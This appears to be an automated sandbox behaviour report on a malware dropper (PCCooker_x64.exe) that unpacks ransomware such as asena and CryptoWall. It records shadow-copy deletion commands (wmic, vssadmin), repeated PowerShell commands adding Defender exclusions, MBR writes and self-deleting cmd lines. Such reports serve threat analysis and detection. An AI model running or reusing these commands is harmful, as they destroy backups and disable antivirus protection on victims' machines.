Token: SeTakeOwnershipPrivilege	2944	wmic.exe
Token: SeLoadDriverPrivilege	2944	wmic.exe
Token: SeSystemProfilePrivilege	2944	wmic.exe
Token: SeSystemtimePrivilege	2944	wmic.exe
Token: SeProfSingleProcessPrivilege	2944	wmic.exe
Token: SeIncBasePriorityPrivilege	2944	wmic.exe
Token: SeCreatePagefilePrivilege	2944	wmic.exe
Token: SeBackupPrivilege	2944	wmic.exe
Token: SeRestorePrivilege	2944	wmic.exe
Token: SeShutdownPrivilege	2944	wmic.exe
Token: SeDebugPrivilege	2944	wmic.exe
Token: SeSystemEnvironmentPrivilege	2944	wmic.exe
Token: SeRemoteShutdownPrivilege	2944	wmic.exe
Token: SeUndockPrivilege	2944	wmic.exe
Token: SeManageVolumePrivilege	2944	wmic.exe
Token: 33	2944	wmic.exe
Token: 34	2944	wmic.exe
Token: 35	2944	wmic.exe
Token: SeIncreaseQuotaPrivilege	2944	wmic.exe
Token: SeSecurityPrivilege	2944	wmic.exe
Token: SeTakeOwnershipPrivilege	2944	wmic.exe
Token: SeLoadDriverPrivilege	2944	wmic.exe
Token: SeSystemProfilePrivilege	2944	wmic.exe
Token: SeSystemtimePrivilege	2944	wmic.exe
Token: SeProfSingleProcessPrivilege	2944	wmic.exe
Token: SeIncBasePriorityPrivilege	2944	wmic.exe
Token: SeCreatePagefilePrivilege	2944	wmic.exe
Token: SeBackupPrivilege	2944	wmic.exe
Token: SeRestorePrivilege	2944	wmic.exe
Token: SeShutdownPrivilege	2944	wmic.exe
Token: SeDebugPrivilege	2944	wmic.exe
Token: SeSystemEnvironmentPrivilege	2944	wmic.exe
Token: SeRemoteShutdownPrivilege	2944	wmic.exe
Token: SeUndockPrivilege	2944	wmic.exe
Token: SeManageVolumePrivilege	2944	wmic.exe
Token: 33	2944	wmic.exe
Token: 34	2944	wmic.exe
Token: 35	2944	wmic.exe
Token: SeBackupPrivilege	2172	vssvc.exe
Token: SeRestorePrivilege	2172	vssvc.exe
Token: SeAuditPrivilege	2172	vssvc.exe
Token: SeDebugPrivilege	2428	4363463463464363463463463.exe
Token: SeDebugPrivilege	2060	24.exe
Token: SeDebugPrivilege	2492	25.exe
Token: SeDebugPrivilege	3048	22.exe
Token: SeDebugPrivilege	924	23.exe
Token: SeDebugPrivilege	2384	21.exe
Token: SeDebugPrivilege	2496	19.exe
Token: SeDebugPrivilege	2176	17.exe
Token: SeDebugPrivilege	2892	16.exe
Token: SeDebugPrivilege	2984	20.exe
Token: SeDebugPrivilege	800	18.exe
Token: SeDebugPrivilege	224	15.exe
Token: SeDebugPrivilege	3004	13.exe
Token: SeDebugPrivilege	2708	14.exe
Token: SeDebugPrivilege	1572	11.exe
Token: SeDebugPrivilege	1744	9.exe
Token: SeDebugPrivilege	2520	10.exe
Token: SeDebugPrivilege	2336	12.exe
Token: SeDebugPrivilege	1052	7.exe
Token: SeDebugPrivilege	2736	5.exe
Token: SeDebugPrivilege	3060	6.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 804 wrote to memory of 2428	804	PCCooker_x64.exe	30
PID 804 wrote to memory of 2428	804	PCCooker_x64.exe	30
PID 804 wrote to memory of 2428	804	PCCooker_x64.exe	30
PID 804 wrote to memory of 2428	804	PCCooker_x64.exe	30
PID 804 wrote to memory of 1976	804	PCCooker_x64.exe	31
PID 804 wrote to memory of 1976	804	PCCooker_x64.exe	31
PID 804 wrote to memory of 1976	804	PCCooker_x64.exe	31
PID 804 wrote to memory of 1976	804	PCCooker_x64.exe	31
PID 804 wrote to memory of 2296	804	PCCooker_x64.exe	33
PID 804 wrote to memory of 2296	804	PCCooker_x64.exe	33
PID 804 wrote to memory of 2296	804	PCCooker_x64.exe	33
PID 804 wrote to memory of 2296	804	PCCooker_x64.exe	33
PID 804 wrote to memory of 2912	804	PCCooker_x64.exe	34
PID 804 wrote to memory of 2912	804	PCCooker_x64.exe	34
PID 804 wrote to memory of 2912	804	PCCooker_x64.exe	34
PID 804 wrote to memory of 2912	804	PCCooker_x64.exe	34
PID 804 wrote to memory of 2340	804	PCCooker_x64.exe	35
PID 804 wrote to memory of 2340	804	PCCooker_x64.exe	35
PID 804 wrote to memory of 2340	804	PCCooker_x64.exe	35
PID 804 wrote to memory of 2340	804	PCCooker_x64.exe	35
PID 2296 wrote to memory of 2944	2296	asena.exe	36
PID 2296 wrote to memory of 2944	2296	asena.exe	36
PID 2296 wrote to memory of 2944	2296	asena.exe	36
PID 2296 wrote to memory of 2944	2296	asena.exe	36
PID 2296 wrote to memory of 2856	2296	asena.exe	39
PID 2296 wrote to memory of 2856	2296	asena.exe	39
PID 2296 wrote to memory of 2856	2296	asena.exe	39
PID 2296 wrote to memory of 2856	2296	asena.exe	39
PID 2340 wrote to memory of 2768	2340	CryptoWall.exe	38
PID 2340 wrote to memory of 2768	2340	CryptoWall.exe	38
PID 2340 wrote to memory of 2768	2340	CryptoWall.exe	38
PID 2340 wrote to memory of 2768	2340	CryptoWall.exe	38
PID 2768 wrote to memory of 1532	2768	explorer.exe	44
PID 2768 wrote to memory of 1532	2768	explorer.exe	44
PID 2768 wrote to memory of 1532	2768	explorer.exe	44
PID 2768 wrote to memory of 1532	2768	explorer.exe	44
PID 2768 wrote to memory of 2116	2768	explorer.exe	45
PID 2768 wrote to memory of 2116	2768	explorer.exe	45
PID 2768 wrote to memory of 2116	2768	explorer.exe	45
PID 2768 wrote to memory of 2116	2768	explorer.exe	45
PID 2912 wrote to memory of 2492	2912	Bomb.exe	47
PID 2912 wrote to memory of 2492	2912	Bomb.exe	47
PID 2912 wrote to memory of 2492	2912	Bomb.exe	47
PID 2912 wrote to memory of 2060	2912	Bomb.exe	48
PID 2912 wrote to memory of 2060	2912	Bomb.exe	48
PID 2912 wrote to memory of 2060	2912	Bomb.exe	48
PID 2912 wrote to memory of 924	2912	Bomb.exe	49
PID 2912 wrote to memory of 924	2912	Bomb.exe	49
PID 2912 wrote to memory of 924	2912	Bomb.exe	49
PID 2912 wrote to memory of 3048	2912	Bomb.exe	50
PID 2912 wrote to memory of 3048	2912	Bomb.exe	50
PID 2912 wrote to memory of 3048	2912	Bomb.exe	50
PID 2912 wrote to memory of 2384	2912	Bomb.exe	51
PID 2912 wrote to memory of 2384	2912	Bomb.exe	51
PID 2912 wrote to memory of 2384	2912	Bomb.exe	51
PID 2912 wrote to memory of 2984	2912	Bomb.exe	52
PID 2912 wrote to memory of 2984	2912	Bomb.exe	52
PID 2912 wrote to memory of 2984	2912	Bomb.exe	52
PID 2912 wrote to memory of 2496	2912	Bomb.exe	53
PID 2912 wrote to memory of 2496	2912	Bomb.exe	53
PID 2912 wrote to memory of 2496	2912	Bomb.exe	53
PID 2912 wrote to memory of 800	2912	Bomb.exe	54
PID 2912 wrote to memory of 800	2912	Bomb.exe	54
PID 2912 wrote to memory of 800	2912	Bomb.exe	54

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1272
- C:\Users\Admin\AppData\Local\Temp\PCCooker_x64.exe
  "C:\Users\Admin\AppData\Local\Temp\PCCooker_x64.exe"
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:804
- - C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
    "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:2428
  - - C:\Users\Admin\AppData\Local\Temp\Files\66b5d9d3adbaa_defaultr.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\66b5d9d3adbaa_defaultr.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      PID:1940
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:6324
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:4900
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        Blocklisted process makes network request
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        
        PID:5348
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" & rd /s /q "C:\ProgramData\BFIJEHCBAKFC" & exit
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3620
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        7⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:5796
  - - C:\Users\Admin\AppData\Local\Temp\Files\pyl64.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\pyl64.exe"
      4⤵
      Executes dropped EXE
      PID:5460
  - - C:\Users\Admin\AppData\Local\Temp\Files\66e805302f63c_otr.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\66e805302f63c_otr.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:5352
  - - C:\Users\Admin\AppData\Local\Temp\Files\66c6def3f0546_sss.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\66c6def3f0546_sss.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:6212
    - - C:\Users\Admin\AppData\Local\Temp\Files\66c6def3f0546_sss.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\66c6def3f0546_sss.exe"
        5⤵
        Executes dropped EXE
        
        PID:6364
    - - C:\Users\Admin\AppData\Local\Temp\Files\66c6def3f0546_sss.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\66c6def3f0546_sss.exe"
        5⤵
        Executes dropped EXE
        
        PID:4464
    - - C:\Users\Admin\AppData\Local\Temp\Files\66c6def3f0546_sss.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\66c6def3f0546_sss.exe"
        5⤵
        Executes dropped EXE
        
        PID:4564
    - - C:\Users\Admin\AppData\Local\Temp\Files\66c6def3f0546_sss.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\66c6def3f0546_sss.exe"
        5⤵
        Executes dropped EXE
        
        PID:6036
    - - C:\Users\Admin\AppData\Local\Temp\Files\66c6def3f0546_sss.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\66c6def3f0546_sss.exe"
        5⤵
        Executes dropped EXE
        
        PID:6912
  - - C:\Users\Admin\AppData\Local\Temp\Files\ngrok86.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\ngrok86.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:6096
  - - C:\Users\Admin\AppData\Local\Temp\Files\tt.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\tt.exe"
      4⤵
      Executes dropped EXE
      PID:5960
    - - C:\Windows\sysmablsvr.exe
        
        C:\Windows\sysmablsvr.exe
        5⤵
        
        PID:5236
  - - C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe"
      4⤵
      PID:5796
  - - C:\Users\Admin\AppData\Local\Temp\Files\t2.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\t2.exe"
      4⤵
      PID:2948
- - C:\Users\Admin\AppData\Local\Temp\a76e49df84ba2a7b33e8ea959995b5e6faecb90d551ef169d8272ce9042c35a5.exe
    "C:\Users\Admin\AppData\Local\Temp\a76e49df84ba2a7b33e8ea959995b5e6faecb90d551ef169d8272ce9042c35a5.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1976
- - C:\Users\Admin\AppData\Local\Temp\asena.exe
    "C:\Users\Admin\AppData\Local\Temp\asena.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Enumerates connected drives
    - Writes to the Master Boot Record (MBR)
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2296
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic.exe shadowcopy delete
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2944
  - - C:\Windows\system32\vssadmin.exe
      vssadmin delete shadows /all /quiet
      4⤵
      Interacts with shadow copies
      PID:2856
  - - C:\Windows\SysWOW64\notepad.exe
      C:\Users\Public\Documents\RGNR_2055E903.txt
      4⤵
      System Location Discovery: System Language Discovery
      Opens file in notepad (likely ransom note)
      PID:5636
- - C:\Users\Admin\AppData\Local\Temp\Bomb.exe
    "C:\Users\Admin\AppData\Local\Temp\Bomb.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2912
  - - C:\Users\Admin\AppData\Local\Temp\25.exe
      "C:\Users\Admin\AppData\Local\Temp\25.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2492
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\25.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4624
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '25.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5476
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5124
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4876
  - - C:\Users\Admin\AppData\Local\Temp\24.exe
      "C:\Users\Admin\AppData\Local\Temp\24.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2060
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\24.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4524
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '24.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5768
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4892
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:7112
  - - C:\Users\Admin\AppData\Local\Temp\23.exe
      "C:\Users\Admin\AppData\Local\Temp\23.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:924
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\23.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1740
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '23.exe'
        5⤵
        
        PID:4768
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6612
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
        5⤵
        
        PID:4440
  - - C:\Users\Admin\AppData\Local\Temp\22.exe
      "C:\Users\Admin\AppData\Local\Temp\22.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:3048
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\22.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4676
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '22.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5604
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2312
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5980
  - - C:\Users\Admin\AppData\Local\Temp\21.exe
      "C:\Users\Admin\AppData\Local\Temp\21.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2384
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\21.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6380
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '21.exe'
        5⤵
        
        PID:5676
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
        5⤵
        
        PID:1904
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
        5⤵
        
        PID:5628
  - - C:\Users\Admin\AppData\Local\Temp\20.exe
      "C:\Users\Admin\AppData\Local\Temp\20.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2984
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\20.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5080
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '20.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:6008
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4672
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2136
  - - C:\Users\Admin\AppData\Local\Temp\19.exe
      "C:\Users\Admin\AppData\Local\Temp\19.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2496
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\19.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7136
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '19.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6508
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7076
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3140
  - - C:\Users\Admin\AppData\Local\Temp\18.exe
      "C:\Users\Admin\AppData\Local\Temp\18.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:800
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\18.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4820
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '18.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5428
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5228
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5292
  - - C:\Users\Admin\AppData\Local\Temp\17.exe
      "C:\Users\Admin\AppData\Local\Temp\17.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2176
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\17.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7060
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '17.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4848
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4712
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5296
  - - C:\Users\Admin\AppData\Local\Temp\16.exe
      "C:\Users\Admin\AppData\Local\Temp\16.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2892
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\16.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4560
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '16.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4424
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5916
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3316
  - - C:\Users\Admin\AppData\Local\Temp\15.exe
      "C:\Users\Admin\AppData\Local\Temp\15.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:224
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\15.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4276
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '15.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5960
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4740
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:7152
  - - C:\Users\Admin\AppData\Local\Temp\14.exe
      "C:\Users\Admin\AppData\Local\Temp\14.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2708
